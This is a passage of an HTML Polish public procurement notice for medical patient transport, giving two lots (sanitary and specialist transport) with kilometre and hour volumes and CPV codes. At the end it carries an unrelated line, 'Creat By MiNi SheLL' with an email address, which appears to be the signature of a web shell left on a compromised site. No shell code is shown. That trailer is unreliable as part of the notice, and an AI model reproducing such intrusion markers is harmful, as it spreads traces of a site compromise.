<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Transport sanitarny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Przewóz pacjenta,  personelu , materiału biologicznego  z zespołem T	Km	300 738					
2	Przewóz pacjenta,  personelu , materiału biologicznego z zespołem T	godz	8 457.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Transport specjalistyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Przewóz pacjenta - transport specjalistyczny z zespołem S	Km	23 750					
2	Przewóz pacjenta  - transport specjalistyczny z zespołem S	godz	478.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com